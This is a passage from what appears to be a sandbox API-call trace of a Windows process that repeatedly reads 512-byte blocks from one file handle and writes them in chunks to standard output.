lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.272] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.272] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.272] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.272] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.272] GetFileType (hFile=0x50) returned 0x1 [0127.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.272] GetFileType (hFile=0x50) returned 0x1 [0127.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.272] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] GetFileType (hFile=0x50) returned 0x1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] GetFileType (hFile=0x50) returned 0x1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] GetFileType (hFile=0x50) returned 0x1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] GetFileType (hFile=0x50) returned 0x1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] GetFileType (hFile=0x50) returned 0x1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] GetFileType (hFile=0x50) returned 0x1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.276] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.276] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.276] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.276] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] GetFileType (hFile=0x50) returned 0x1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] GetFileType (hFile=0x50) returned 0x1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] GetFileType (hFile=0x50) returned 0x1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] GetFileType (hFile=0x50) returned 0x1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] GetFileType (hFile=0x50) returned 0x1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] GetFileType (hFile=0x50) returned 0x1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] GetFileType (hFile=0x50) returned 0x1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] GetFileType (hFile=0x50) returned 0x1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.277] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.277] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] GetFileType (hFile=0x50) returned 0x1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] GetFileType (hFile=0x50) returned 0x1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] GetFileType (hFile=0x50) returned 0x1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] GetFileType (hFile=0x50) returned 0x1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] GetFileType (hFile=0x50) returned 0x1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] GetFileType (hFile=0x50) returned 0x1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] GetFileType (hFile=0x50) returned 0x1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType (hFile=0x50) returned 0x1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.278] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.278] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType (hFile=0x50) returned 0x1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType (hFile=0x50) returned 0x1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType (hFile=0x50) returned 0x1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType (hFile=0x50) returned 0x1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType (hFile=0x50) returned 0x1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType (hFile=0x50) returned 0x1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType (hFile=0x50) returned 0x1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType (hFile=0x50) returned 0x1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.279] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.279] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.279] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.279] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] GetFileType (hFile=0x50) returned 0x1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] GetFileType (hFile=0x50) returned 0x1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] GetFileType (hFile=0x50) returned 0x1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] GetFileType (hFile=0x50) returned 0x1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] GetFileType (hFile=0x50) returned 0x1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] GetFileType (hFile=0x50) returned 0x1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] GetFileType (hFile=0x50) returned 0x1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] GetFileType (hFile=0x50) returned 0x1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.280] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.280] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] GetFileType (hFile=0x50) returned 0x1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] GetFileType (hFile=0x50) returned 0x1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] GetFileType (hFile=0x50) returned 0x1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] GetFileType (hFile=0x50) returned 0x1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] GetFileType (hFile=0x50) returned 0x1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] GetFileType (hFile=0x50) returned 0x1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] GetFileType (hFile=0x50) returned 0x1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] GetFileType (hFile=0x50) returned 0x1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.281] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.281] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.281] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.281] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] GetFileType (hFile=0x50) returned 0x1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] GetFileType (hFile=0x50) returned 0x1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] GetFileType (hFile=0x50) returned 0x1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] GetFileType (hFile=0x50) returned 0x1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] GetFileType (hFile=0x50) returned 0x1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] GetFileType (hFile=0x50) returned 0x1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] GetFileType (hFile=0x50) returned 0x1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] GetFileType (hFile=0x50) returned 0x1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.282] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.282] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.282] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.282] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] GetFileType (hFile=0x50) returned 0x1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] GetFileType (hFile=0x50) returned 0x1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, 